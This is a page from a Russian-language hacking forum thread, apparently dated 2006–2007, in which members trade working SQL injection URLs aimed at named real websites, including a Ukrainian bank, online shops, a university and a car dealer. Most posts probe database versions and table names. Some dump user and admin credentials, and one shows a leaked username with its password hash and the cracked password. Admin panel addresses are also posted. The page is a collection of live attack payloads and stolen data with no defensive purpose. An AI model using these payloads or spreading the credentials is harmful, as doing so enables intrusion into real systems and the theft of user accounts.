SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    Code:
    http://www.survival-international.org/news.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18/*
    Code:
    http://bridge-belarus.org/php/person_tours.php?id=-1+union+select+1,2,version(),user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
    Вот, наверное последние на сегодня. :) ;) :cool:
     
  2. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Колкру, доделываю твою работу =)


    www.mercedes-benz.ru

    ...в процессе...
    Code:
    http://www.mercedes-benz.ru/company/news/?type=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
    еще одна, пока не ковырял, парюсь с колонками первой
    Code:
    http://www.mercedes-benz.ru/faq/?type=5-1


    slavutichbank.kiev.ua


    Code:
    http://slavutichbank.kiev.ua/main.php?mid=9999+union+select+1,2/*
     
    #942 Ksander, 12 Mar 2007
    Last edited: 12 Mar 2007
    1 person likes this.
  3. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    http://www.okeo.ru/xo4u.php?id=-81202+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat(nick,char(58),email,char(58),passw),0x71),0x71),4,5,6,7,8,9,10+FROM+chausers+limit+1,1/* всего юзеров 3223 ни пассов ни мыла нету :( одним словом лажа.
     
    1 person likes this.
  4. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    Code:
    http://www.fotoline.ru/divisions.php?id=-1+union+select+1,2,version(),4/*
    ____
    1000-oe сообщение в этой теме)) :D :D :cool:
     
  5. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    sportshopik.ru
    Code:
    http://www.sportshopik.ru/shop.php?CID=-1+union+select+1,concat(user,0x3a,password)+from+mysql.user+limit+1,1/*
    vavaha:5fb4ffc22deb3e8c
    mysql4hash.
    5fb4ffc22deb3e8c=vova

    upd: млин, забыл
    админка _http://www.sportshopik.ru/forum/admin.php

    ps: #1001 :)
     
    #945 n1†R0x, 12 Mar 2007
    Last edited: 12 Mar 2007
    1 person likes this.
  6. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
     
    #946 Ksander, 12 Mar 2007
    Last edited: 12 Mar 2007
  7. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    ___
     
    1 person likes this.
  8. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://onlinesexshop.ru/view/?id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13/*
    Code:
    http://www.alvatex.ru/catalog.html?cid=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*
     
  9. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    =\
     
    1 person likes this.
  10. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    www.petrocommerce.com.ua

    колонки правда не все, упарился уже =(
    Code:
    http://www.petrocommerce.com.ua/view.php?id=-1+union+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/*
     
    1 person likes this.
  11. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    http://marykay.freshop.ru/good.php?id=-8+union+select+1,2,3,4,5,6,7,8/*
    какой то тупой магаз =\
    http://www.saletv.ru/listcatalog.php?id=-2+union+select+1,2/*
    и это тоже
     
    #951 Spyder, 12 Mar 2007
    Last edited: 12 Mar 2007
  12. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    2Spyder
    http://marykay.freshop.ru/good.php?id=-8+union+select+1,concat(username,char(58),password),3,4,5,6,7,8+from+prgp_user/* ;)
     
    1 person likes this.
  13. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    Логин и пароль админа в чистом виде.

    Админка: http://www.landlords.ru/admin .
    :cool:
    ___________
    Code:
    http://www.extenzilla.org/scheda_estensione.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,table_name,20,21,22,23,24+from+INFORMATION_SCHEMA.TABLES+limit+0,1/*
    ___________
    Code:
    http://www.consumententv.nl/terugkijken.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,version()/*
     
    #953 Colkru, 13 Mar 2007
    Last edited: 13 Mar 2007
  14. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Два секс-шопа ;)

    Code:
    http://ixi.kiev.ua/catalog.php?r='+union+select+1,2,3,table_name+from+information_schema.tables+limit+17,1/*
    Code:
    http://www.sexshop-online.ru/index.php?part=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13/*
     
    1 person likes this.
  15. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.redbullairrace.com/pilots.php?id=-16+union+select+1,2,3,4,convert(version()+using+latin1),6,7,8,9,10,11,12,13,14,15,16
     
  16. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    Amobile.ru

    http://www.amobile.ru/logo/color/loadpic.php?id=-1+union+select+user(),version(),3,4,5,6,7,8/*

    Таблицы не подобрал.
     
  17. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Ну чтож, поехали =)

    Code:
    http://www.boyersteel.com/products.php?id=-1+union+select+version(),2,3,4/*

    Можно чекнутся =( и это еще не все =( сколько ж их там :eek:
    Code:
    http://www.mercedes-benz.ru/company/news/?type=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121/*
     
    #957 Ksander, 13 Mar 2007
    Last edited: 13 Mar 2007
    1 person likes this.
  18. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    ок, го
    http://www.gnn.tv/users/user.php?id=-31+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,version(),24,25,26,27,28,29,30,31
     
  19. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    http://www.virtusroma.it/comunicati.php?id=-1+union+select+1,2,version(),4,5,6/*
     
  20. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.nsu.ru/dynamic/news/news_view.php?news_mode=single&news_user=user&news_action=view&news_id=-1+union+Select+version(),2,3,4,5,6,7,8/*
     
    1 person likes this.
Thread Status:
Not open for further replies.